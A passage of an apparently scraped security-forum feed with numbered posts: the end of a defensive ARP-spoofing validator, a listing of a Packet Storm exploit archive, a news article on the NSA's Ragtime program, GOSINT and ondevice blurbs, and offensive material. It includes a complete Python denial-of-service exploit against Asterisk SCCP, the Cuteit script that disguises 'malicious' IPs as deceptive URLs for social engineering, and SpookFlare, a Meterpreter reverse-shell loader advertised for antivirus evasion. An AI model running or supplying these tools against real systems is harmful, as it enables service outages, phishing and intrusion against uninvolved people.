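socket to send the TCP SYN and watch for SYN/ACK or RST, which cannot run
offline, so the probe is injected as a callable and the demo supplies a
fake one. Every MAC and IP address below is made up."""
import struct

ETHERTYPE_ARP = 0x0806
ARP_REPLY = 2


def _mac(raw):
    return ":".join("%02x" % b for b in raw)


def _ip(raw):
    return ".".join(str(b) for b in raw)


def parse_arp_frame(frame):
    """Ethernet II + ARP (IPv4 over Ethernet) -> dict, or None if not such a frame."""
    if len(frame) < 42:
        return None
    eth_dst, eth_src, ethertype = struct.unpack("!6s6sH", frame[:14])
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, oper, sha, spa, tha, tpa = struct.unpack(
        "!HHBBH6s4s6s4s", frame[14:42])
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_src": _mac(eth_src), "eth_dst": _mac(eth_dst), "oper": oper,
            "sha": _mac(sha), "spa": _ip(spa), "tha": _mac(tha), "tpa": _ip(tpa)}


def build_arp_reply(eth_src, eth_dst, sha, spa, tha, tpa):
    """Constructed test frame; eth_* and sha/tha may deliberately disagree."""
    mac = lambda s: bytes(int(x, 16) for x in s.split(":"))
    ip = lambda s: bytes(int(x) for x in s.split("."))
    return (struct.pack("!6s6sH", mac(eth_dst), mac(eth_src), ETHERTYPE_ARP) +
            struct.pack("!HHBBH6s4s6s4s", 1, 0x0800, 6, 4, ARP_REPLY,
                        mac(sha), ip(spa), mac(tha), ip(tpa)))


def header_consistent(pkt):
    """Stage 2: addresses in the MAC header must match those in the ARP header."""
    return pkt["eth_src"] == pkt["sha"] and pkt["eth_dst"] == pkt["tha"]


class Validator:
    """probe(mac, ip) must return True if a SYN to that pair got SYN/ACK or RST."""

    def __init__(self, my_mac, probe):
        self.my_mac, self.probe = my_mac, probe
        self.valid_hosts = {}      # ip -> mac, what --hostdb persists
        self.alerts = []           # what the Notifier would raise

    def handle(self, frame):
        pkt = parse_arp_frame(frame)
        # Stage 1: only ARP replies, and not the ones we sent ourselves.
        if pkt is None or pkt["oper"] != ARP_REPLY or pkt["eth_src"] == self.my_mac:
            return "ignored"
        if not header_consistent(pkt):
            self.alerts.append(("inconsistent", pkt["spa"], pkt["eth_src"], pkt["sha"]))
            return "inconsistent"
        if self.valid_hosts.get(pkt["spa"]) == pkt["sha"]:
            return "cached"        # mapping already validated, skip the probe
        # Stage 3: a genuine stack at (sha, spa) answers the SYN; a liar cannot.
        if self.probe(pkt["sha"], pkt["spa"]):
            self.valid_hosts[pkt["spa"]] = pkt["sha"]
            return "valid"
        self.alerts.append(("spoofed", pkt["spa"], pkt["sha"]))
        return "spoofed"


def demo():
    """Constructed LAN: 10.0.0.1 really lives at aa:..:01; de:ad:.. claims it too."""
    truth = {"10.0.0.1": "aa:aa:aa:aa:aa:01"}
    fake_probe = lambda mac, ip: truth.get(ip) == mac    # stands in for the SYN probe
    me_mac, me_ip = "cc:cc:cc:cc:cc:01", "10.0.0.9"
    v = Validator(me_mac, fake_probe)
    legit = build_arp_reply("aa:aa:aa:aa:aa:01", me_mac, "aa:aa:aa:aa:aa:01", "10.0.0.1", me_mac, me_ip)
    spoof = build_arp_reply("de:ad:be:ef:00:01", me_mac, "de:ad:be:ef:00:01", "10.0.0.1", me_mac, me_ip)
    mixed = build_arp_reply("de:ad:be:ef:00:01", me_mac, "aa:aa:aa:aa:aa:01", "10.0.0.1", me_mac, me_ip)
    return [v.handle(legit), v.handle(legit), v.handle(spoof), v.handle(mixed)], v.alerts
```

The "Issues" section above maps directly onto the probe: a host whose firewall drops the SYN makes `probe` return False for a legitimate mapping (false positive), and an attacker with a custom stack answering SYNs for addresses it does not own makes it return True (false negative). The cached `valid_hosts` table also means a later, different MAC for an already-validated IP is probed rather than trusted, which is the case that matters most for poisoning.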
  17. This archive contains all of the 126 exploits added to Packet Storm in November, 2017. Content: actiontecc1000a-backdoor.txt aroxschoolerpphp-sql.txt asterisk13172-dos.txt AVAYA-OFFICE-IP-IPO-v9.1.0-10.1-SOFT-CONSOLE-REMOTE-BUFFER-OVERFLOW-0DAY.txt AVAYA-OFFICE-IP-IPO-v9.1.0-10.1-VIEWERCTRL-ACTIVE-X-BUFFER-OVERFLOW-0DAY.txt avgater-flaw.txt aztech-bypass.txt basicb2b-sql.txt cmslite14-sql.txt communigatepro-xss.txt coolplayer-2.19.6-bindshell-exploit.py.txt cpaleadreward-sql.txt csccart462-exec.txt CSNC-2017-029.txt CSNC-2017-030.txt CVE-2017-5124-master.zip CVE-2017-6331-SYMANTEC-ENDPOINT-PROTECTION-TAMPER-PROTECTION-BYPASS.txt cve_2017_8464_lnk_lpe.rb.txt debutembeddedhttpd120-dos.txt dell-escalate.txt divinglog6-xxe.txt dlink-850-admin-creds-retriever.sh.txt dlinkdc936l-xsrf.txt dlinkdir605l208-dos.txt dlink_dir850l_unauth_exec.rb.txt dmb23-dllhijack.txt dupscout10018-overflow.txt exim489-dos.txt fakemagazinecover-sql.txt freefloatftpd-exploit.py.txt geutebrueck_gcore_x64_rce_bo.rb.txt graphicsmagick-discloseoverflow.txt GS20171110181405.txt GS20171115170453.tgz GS20171115170601.tgz GS20171115170716.tgz GS20171116003633.txt GS20171116003938.txt GS20171116004108.txt GS20171116004241.txt GS20171121191436.tgz GS20171121191617.tgz GS20171122154332.txt GS20171122154609.txt GS20171122154803.txt GS20171122155126.txt GS20171122155447.txt GS20171122155626.txt GS20171122155815.txt GS20171122160017.txt GS20171125145922.txt GS20171125150442.txt GS20171125150614.txt GS20171125150745.txt GS20171125150941.txt GS20171125151104.txt GS20171125151523.txt GS20171128144437.tgz GS20171201024948.tgz hikvision-roguessid.txt HugeDirtyCowPOC-master.zip ibmlotusnotes-dos.rb.txt ikarus2167-escalate.txt ipswitchwsftpprof-overflow.txt isms230-sql.txt kirbycms-xss.txt KL-001-2017-022.txt linux413smepsmap-escalate.txt lms790-xss.txt makoserver_cmd_exec.rb.txt meaam13-sql.txt mkvalidator-dos.tgz monstra304-xss.txt mymagazineblogcms10-sql.txt newsmagblogcms10-sql.txt 
newspapermbcms10-sql.txt nicephpfaq-sql.txt octobercms10426-xsrf.txt oraclejavase-xxedisclose.txt oraclepsept-exec.txt pfsense2311-exec.txt pfsense_group_member_exec.rb.txt phpmyfaq2.9.9-exec.txt protectedlinks-sql.txt qemunbd-overflow.txt root_no_password.rb.txt rt-sa-2016-008.txt SA-20171114-0.txt SA-20171116-0.txt schoolcms100-upload.txt schoolcms100-xss.txt sera_1.2.sh.txt shareet-sql.txt smplayer17110-dos.txt synologysm52-exec.txt tic-overflow.tgz tnftp_savefile.rb.txt ulterius-traversal.txt uszipcodesdb-sql.txt viritexplorer-escalate.txt vivotekip-overflow.txt vxsearch10214-overflow.py.txt web2project33-xss.txt webviewer100193-upload.rb.txt whatsapp21752-dos.txt wpaafcbp13-xss.txt wpamptoolbox194-xss.txt wpamtythumb813-xss.txt wpappointments2222-xss.txt wpaptr11-xss.txt wpboozang100-xss.txt wpbreezingforms12742-xss.txt wpcartogiraffemap10-xss.txt wpdfdreddcointips111-xss.txt wpemagmc10-xss.txt wpinlink10-sql.txt wpjtrtrt41-sql.txt wpmigration1228-xss.txt wp_mobile_detector_upload_execute.rb.txt wpshtml5vp314-xss.txt wpuif12-xss.txt wpuserpro-bypass.txt wpwoocommerce2030-traversal.txt wpyoastseo-xss.txt X41-2017-006.txt xlightftp3885-overflow.txt zktimeweb20112280-xsrf.txt zktimeweb20112280-xss.txt ZSL-2017-5440.txt ztezxdsl831-bypass.txt zyxelpk5001z-backdoor.txt Download: https://packetstormsecurity.com/files/download/145175/1711-exploits.tgz
  18. Several more variants of Ragtime appear in recently leaked documents.

A leaked document shines new light on a surveillance program developed by the National Security Agency. The program, known as Ragtime, collects the contents of communications, such as emails and text messages, of foreign nationals under the authority of several US surveillance laws.

Details of the program are held in the highest tiers of secrecy, known as exceptionally controlled information, with only a few NSA staffers having access to the program and its data.

There were four known versions, according to a 2013 book, released just months before the first documents published from the cache of documents leaked by whistleblower Edward Snowden. Ragtime-A is said to involve the US-based collection of foreign-to-foreign counterterrorism data; Ragtime-B collects foreign government data that travels through the US; and Ragtime-C focuses on the nuclear counterproliferation effort. Another version, Ragtime-P, is said to stand for the Patriot Act, which authorizes the collection of bulk metadata on calls and emails sent over the networks of telecom providers. A leaked court order showed Verizon was ordered to turn over customer call records to the NSA on a daily basis. Dozens of other companies have also been compelled to provide data for Ragtime.

But the Ragtime program has many more versions -- including one that appears to involve Americans' data.

The document was found buried in a virtual hard disk, discovered by UpGuard's Chris Vickery. The document seen by ZDNet, dated November 2011, shows the Ragtime program has eleven variants, including the four that were already known. The document alludes to Ragtime-BQ, F, N, PQ, S, and T. The eleventh version refers to Ragtime-USP. "USP" is a common term used across the intelligence community to refer to "US person," like a US citizen or lawful permanent resident.
Americans are generally protected from government surveillance under the Fourth Amendment. A few exceptions exist, such as if the secretive Washington DC-based Foreign Intelligence Surveillance Court, which authorizes the government's spying activities, issues a warrant based on probable cause, such as if there is evidence of an American working for a foreign power. But the NSA has long "incidentally" collected data on Americans, reports and research have revealed.

Ragtime dates back to 2002, according to a previously-leaked document. The program forms part of a wider collection of systems and databases under the STELLARWIND umbrella of warrantless surveillance programs, launched under the authority of then-president George W. Bush in response to the September 11, 2001 terrorist attacks. After a series of leaks in 2008 detailing the scope and breadth of STELLARWIND's domestic collection capability, Congress limited the government's surveillance powers.

Changes to the law had an immediate impact on the Ragtime program. Although the government was barred from collecting new metadata on Americans under Ragtime-P, the NSA retained the data. Analysts with clearance were still permitted to search the database.

Only a fraction of NSA staffers have the appropriate security clearance to access Ragtime's databases. One previously leaked document says analysts must have special "need to know" clearance to access the data, and any information relating to Ragtime is restricted from being shared with foreign intelligence partners. The exception is Ragtime-C, for which the new document implies a level of co-operation from the UK government.

The data stored in Ragtime's databases is so sensitive that their very existence is compartmentalized. The clearance level for each Ragtime version, according to the document, is "unpublished," in an effort to ensure that the programs themselves aren't widely known about across the agency.
The NSA said in internal security guidance that unpublished classification markings are set for some programs "due to sensitivity and restrictive access controls."

When reached, an NSA spokesperson declined to comment on Ragtime, or its purpose.

News of the leak comes just weeks before Congress has to pass reforms or a reauthorization of the US government's surveillance laws. Lawmakers have until the end of the year to pass a bill to ensure powers under the Foreign Intelligence Surveillance Act are put back in the law books, or the NSA risks losing those powers at the end of the annual intelligence cycle. These are the same powers that authorized the controversial PRISM program, which collects data from servers of internet giants, the massive bulk collection of internet traffic, and the government's computer and network hacking powers.

Several bills have already been floated by members of both the House and Senate. US intelligence chiefs are pushing for a permanent reauthorization of the surveillance powers, while privacy groups are fighting for greater transparency. Several members of Congress have vowed to fight the reauthorization until they learn how many Americans are swept up in section 702 surveillance. The government's spy chief has so far refused to say what that number is.

Via http://www.zdnet.com/article/ragtime-program-appear-in-nsa-leaked-files/
  19. Asterisk version 13.17.2~dfsg-2 suffers from a remote unauthenticated memory exhaustion vulnerability.

# Exploit Author: Juan Sacco <juan.sacco@kpn.com> at KPN Red Team - http://www.kpn.com
# Date and time of release: Nov, 15 2017
# Found this and more exploits on my open source security project: http://www.exploitpack.com
#
# Tested on: Asterisk 13.17.2~dfsg-2
#
# Description: Asterisk is prone to a remote unauthenticated memory exhaustion
# The vulnerability is due to an error when the vulnerable application handles crafted SCCP packet. A remote attacker may be able to exploit this to cause a denial of service condition on the affected system.
#
# [Nov 29 15:38:06] ERROR[7763] tcptls.c: TCP/TLS unable to launch helper thread: Cannot allocate memory
#
# Program: Asterisk is an Open Source PBX and telephony toolkit. It is, in a
# sense, middleware between Internet and telephony channels on the bottom,
# and Internet and telephony applications at the top.
#
# Homepage: http://www.asterisk.org/
# Filename: pool/main/a/asterisk/asterisk_13.17.2~dfsg-2_i386.deb
#
# Example usage: python asteriskSCCP.py 192.168.1.1 2000

import binascii
import sys
import socket
import time

def asteriskSCCP(target, port):
    try:
        while 1:
            # Open socket
            s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            # Set reuse ON
            s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
            # Bind port
            s.connect((target, port))
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Connected to:"), target, port
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Establishing connection..")
            packet = binascii.unhexlify(b'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')
            # Log the packet in hexa and timestamp
            fileLog = target + ".log"
            logPacket = open(fileLog, "w+")
            logPacket.write("[" + time.strftime('%a %H:%M:%S') + "]" + " - Packet sent: " + binascii.hexlify(bytes(packet)) + "\n")
            logPacket.close()
            # Write bytecodes to socket
            print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Packet sent: ")
            s.send(bytes(packet))
            # Packet sent:
            print(bytes(packet))
            try:
                data = s.recv(4096)
                print("[" + time.strftime('%a %H:%M:%S') + "]" + " - " + "Data received: '{msg}'".format(msg=data))
            except socket.error, e:
                print 'Sorry, No data available'
                continue
            s.close()
    except socket.error as error:
        print error
        print "Sorry, something went wrong!"

def howtouse():
    print "Usage: AsteriskSCCP.py Hostname Port"
    print "[*] Mandatory arguments:"
    print "[-] Specify a hostname / port"
    sys.exit(-1)

if __name__ == "__main__":
    try:
        # Set target
        target = sys.argv[1]
        port = int(sys.argv[2])
        print "[*] Asterisk 13.17 Exploit by Juan Sacco "
        print "[*] Red Team KPN <juan.sacco@kpn.com> "
        asteriskSCCP(target, port)
    except IndexError:
        howtouse()

Source: https://packetstormsecurity.com/files/145149/Asterisk-13.17.2-dfsg-2-Memory-Exhaustion.html
  20. A simple Python tool to help you while social engineering by converting your malicious IP into many forms.

Download: Cuteit-master.zip

#Author:D4Vinci

def ip2long(ip):
    ip = ip.split("/")[0].split(":")[0]
    p = ip.split(".")
    return str( ( ( ( ( int(p[0]) * 256 + int(p[1]) ) * 256 ) + int(p[2]) ) * 256 ) + int(p[3]))
    #p[0] + "." + str( ( ( ( int( p[1] ) * 256 + int( p[2] ) ) * 256 ) + int( p[3] ) ) * 256 ),
    #p[0] + "." + p[1] + str( ( int( p[2] ) *256 ) + int( p[3] ) )

def ip2hex(ip):
    ip = ip.split("/")[0].split(":")[0]
    p = ip.split(".")
    return [str( hex( int(p[0]) ) ) +"."+ str( hex( int(p[1]) ) ) +"."+ str( hex( int(p[2]) ) ) +"."+ str( hex( int(p[3]) ) ),
            str( hex( int(p[0]) ) ) +"."+ str( hex( int(p[1]) ) ) +"."+ str( hex( int(p[2]) ) ) +"."+ str( int(p[3]) ),
            str( hex( int(p[0]) ) ) +"."+ str( hex( int(p[1]) ) ) +"."+ str( int(p[2]) ) +"."+ str( int(p[3]) ),
            str( hex( int(p[0]) ) ) +"."+ str( int(p[1]) ) +"."+ str( int(p[2]) ) +"."+ str( int(p[3]) ),
            "0x"+"0"*8+str( hex( int(p[0]) ) ).replace("0x","") +"."+ "0x"+"0"*6+str( hex( int(p[1]) ) ).replace("0x","") +"."+ "0x"+"0"*4+str( hex( int(p[2]) ) ).replace("0x","")+"."+ "0x"+"0"*2+str( hex( int(p[3]) ) ).replace("0x",""),
            str( hex( int( ip2long( ip ) ) ) ).replace( "L" , "" )]

def ip2Octal(ip):
    return '.'.join(format(int(x), '04o') for x in ip.split('.'))

def ip_as_urlencoded(ip):
    ip = ip.split("/")[0]
    en = ""
    for i in ip:
        if i.isdigit():
            en += "%3{}".format(i)
        elif i == ".":
            en += "%2E"
        elif i == ":":
            en += "%3A"
    return en

def ip_as_url(ip):
    return [ "http://howsecureismypassword.net@"+str(ip),
             "http://google.com@"+str( ip2long( ip ) ),
             "http://facebook.com@"+str( ip2hex( ip )[-1] ),
             "http://"+str( ip_as_urlencoded(ip) ),
             "https://www.google.com@search@"+str( ip_as_urlencoded(ip) ),
             "http://anywebsite@"+str( ip2Octal(ip) )]

print "\n Cuteit - Make a malicious ip a bit cuter :D"
print " Note:don't type a long url because it's converts the ip only.!"
ip = raw_input(" ip > ")
ip = ip.replace("http://","")
print "\n"
for n,i in enumerate( ip2hex(ip) + ip_as_url(ip) ):
    if "http" not in i:
        print " ["+str(n)+"] "+"http://"+i
    else:
        print " ["+str(n)+"] "+i
print " [12] http://" + ip2Octal(ip)
print " [13] http://" + ip2long(ip)

https://github.com/D4Vinci/Cuteit
  21. // Better not. Trash
  22. This talk was performed on 7 July 2017 at Camp++ 0x7e1; MKV downloads and presentation slides are available at https://camp.hsbp.org/2017/pp7e1/fahrplan/events/31.html
  23. The GOSINT framework is a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence. Applying threat intelligence to security operations enriches alert data with additional confidence, context, and co-occurrence. This means that you apply research from third parties to security event data to identify similar, or identical, indicators of malicious behavior. The framework is written in Go with a JavaScript frontend.

Installation

Please find the installation procedure at http://gosint.readthedocs.io/en/latest/installation.html

There are three ways to get up and running:
- Bash install script
- Docker
- Manual installation

Updates

Updating is simple and encouraged as bugs are reported and fixed or new features are added. To update your instance of GOSINT, pull the latest version of GOSINT from the repository and re-run the build command to compile the updated binary.

godep go build -o gosint

Configuration

GOSINT needs some quick initial configuration to start making use of the framework features. All the settings you will need to specify can be found under the "Settings" tab. Please find the configuration procedure at http://gosint.readthedocs.io/en/latest/configuration.html

Use

Please find the instructions for use at http://gosint.readthedocs.io/en/latest/use.html

Download: GOSINT-master.zip
Source: https://github.com/ciscocsirt/GOSINT
  24. SpookFlare has a different perspective to bypass security measures and it gives you the opportunity to bypass the endpoint countermeasures at the client-side detection and network-side detection. SpookFlare is a loader generator for Meterpreter Reverse HTTP and HTTPS stages. SpookFlare has a custom encrypter with string obfuscation and run-time code compilation features so you can bypass the countermeasures of the target systems like a boss until they “learn” the technique and behavior of SpookFlare payloads.

- Obfuscation
- Runtime Code Compiling
- Source Code Encryption
- Patched Meterpreter Stage Support

 ___ ___  ___   ___  _  __ ___ _      _   ___ ___
/ __| _ \/ _ \ / _ \| |/ / | __| |    /_\ | _ \ __|
\__ \  _/ (_) | (_) | ' <  | _|| |__ / _ \|   / _|
|___/_|  \___/ \___/|_|\_\ |_| |____/_/ \_\_|_\___|

Version : 1.0
Author : Halil Dalabasmaz
WWW : artofpwn.com
Twitter : @hlldz
Github : @hlldz
Licence : Apache License 2.0
Note : Stay in shadows!
-------------------------------------------------------
[*] You can use "help" command for access help section.

spookflare > help

list : List payloads
generate : Generate payloads
exit : Exit from program

[!] Important: Use x86 listener for x86 payloads and x64 listener for x64 payloads otherwise the process will crash!

spookflare > list

SpookFlare can generate following payloads.

[*] Meterpreter Loader (.EXE) with Custom Encrypter and Custom Stub:
- Meterpreter Reverse HTTP x86/x64
- Meterpreter Reverse HTTPS x86/x64

Technical Details: https://artofpwn.com/spookflare.html

Download: SpookFlare-master.zip
Source: https://github.com/hlldz/SpookFlare
  25. » ondevice ssh
Just like ssh, but for devices without a public IP.
Run commands and copy files just like you'd normally do with ssh, rsync, scp or sftp, no matter where your devices are.
Sign up now and get 5 devices + 5GB/month for free!

Source: http://ondevice.io/